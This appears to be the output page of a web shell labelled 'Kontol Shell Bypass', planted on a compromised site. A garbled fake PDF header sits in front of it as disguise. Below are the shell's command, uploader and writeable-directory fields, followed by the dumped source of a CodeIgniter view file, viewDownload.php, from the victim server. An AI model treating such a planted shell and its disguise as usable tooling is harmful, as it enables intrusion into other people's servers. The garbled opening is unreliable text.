%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/agusttya.com/blog/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/agusttya.com/blog/application/views/viewDownload.php
<div id="content-wrapper">
  <div class="container-fluid">
     <!-- Breadcrumbs-->
	  <ol class="breadcrumb">
		 <li class="breadcrumb-item">
              <a href="<?php echo site_url('home/index'); ?>"><i class="fas fa-fw fa-tachometer-alt"></i> Home</a>
         </li>
		<li class="breadcrumb-item">
		  <a href="<?php echo site_url('events/viewdownload/'.$recordsArray['id']); ?>"> Download Events</a>
		</li>
	  </ol>

		<div class="card-body form-body form-body1">
		<?php echo form_open('events/viewdownload',array('enctype'=>'multipart/form-data')); ?>
				   <div class="card-body">
				   <h4>Download Report</h4>
				   <table class="table table-bordered" id="dataTable" width="100%" cellspacing="0">
                  <thead>
                    <tr>
					<th>Sr. No.</th>
					<th>Title</th>
					<th>Report</th>
					<th>Action</th>

					</tr>
                  </thead>
                  <tbody>
					<?php
					if(count($reportArray)) :
					$cnt=1; 
					foreach ($reportArray as $val) :
					?>                    
                    <tr>
						<td><?php echo htmlentities($cnt);?></td>
						<td><?php echo $val['title'];?></td>
						<td><img src="<?php echo base_url('attachments/files/eventreports/'.$val['report']); ?>" width="50" height="50"></td>
						<td>
						<a href="<?=base_url('events/download/'.$val['event_id'])?>"><input type="submit" name="download" value="download" class="btn btn-danger btn-block" /><input type="hidden" name="id" value="<?php echo $val['id']?>" /></a>
						</td>
					</tr>
			    <?php 
				$cnt++;
				endforeach;
				else : ?>
				<tr>
				<td>No Record found</td>
				<td>&nbsp;</td>
				<td>&nbsp;</td>
				<td>&nbsp;</td>     
                </tr>
				<?php
				endif;
				?> 			
               </tbody>
                </table>
				   <h4>Download Images</h4>
				   <table class="table table-bordered" id="dataTable" width="100%" cellspacing="0">
                  <thead>
                    <tr>
					<th>Sr. No.</th>
					<th>Title</th>
					<th>Report</th>
					<th>Action</th>

					</tr>
                  </thead>
                  <tbody>
					<?php
					if(count($imageArray)) :
					$cnt=1; 
					foreach ($imageArray as $val) :
					?>                    
                    <tr>
						<td><?php echo htmlentities($cnt);?></td>
						<td><?php echo $val['title'];?></td>
						<td><img src="<?php echo base_url('attachments/files/eventreports/'.$val['report']); ?>" width="50" height="50"></td>
						<td>
						<a href="<?=base_url('events/download/'.$val['event_id'])?>"><input type="submit" name="download" value="download" class="btn btn-danger btn-block" /><input type="hidden" name="id" value="<?php echo $val['id']?>" /></a>
						</td>
					</tr>
			    <?php 
				$cnt++;
				endforeach;
				else : ?>
				<tr>
				<td>No Record found</td>
				<td>&nbsp;</td>
				<td>&nbsp;</td>
				<td>&nbsp;</td>     
                </tr>
				<?php
				endif;
				?> 			
               </tbody>
                </table>
				   <h4>Download Videos</h4>
				   <table class="table table-bordered" id="dataTable" width="100%" cellspacing="0">
                  <thead>
                    <tr>
					<th>Sr. No.</th>
					<th>Title</th>
					<th>Report</th>
					<th>Action</th>

					</tr>
                  </thead>
                  <tbody>
					<?php
					if(count($videoArray)) :
					$cnt=1; 
					foreach ($videoArray as $val) :
					?>                    
                    <tr>
						<td><?php echo htmlentities($cnt);?></td>
						<td><?php echo $val['title'];?></td>
						<td><img src="<?php echo base_url('attachments/files/eventreports/'.$val['report']); ?>" width="50" height="50"></td>
						<td>
						<a href="<?php echo base_url().'events/download/'.$val['id']; ?>"><input type="submit" name="download" value="download" class="btn btn-danger btn-block" /><input type="hidden" name="id" value="<?php echo $val['id']?>" /></a>
						</td>
					</tr>
			    <?php 
				$cnt++;
				endforeach;
				else : ?>
				<tr>
				<td>No Record found</td>
				<td>&nbsp;</td>
				<td>&nbsp;</td>
				<td>&nbsp;</td>     
                </tr>
				<?php
				endif;
				?> 			
               </tbody>
                </table>
              </div>
           <?php echo form_close(); ?>
	</div>
   <!-- /.container-fluid -->  
</div>

Kontol Shell Bypass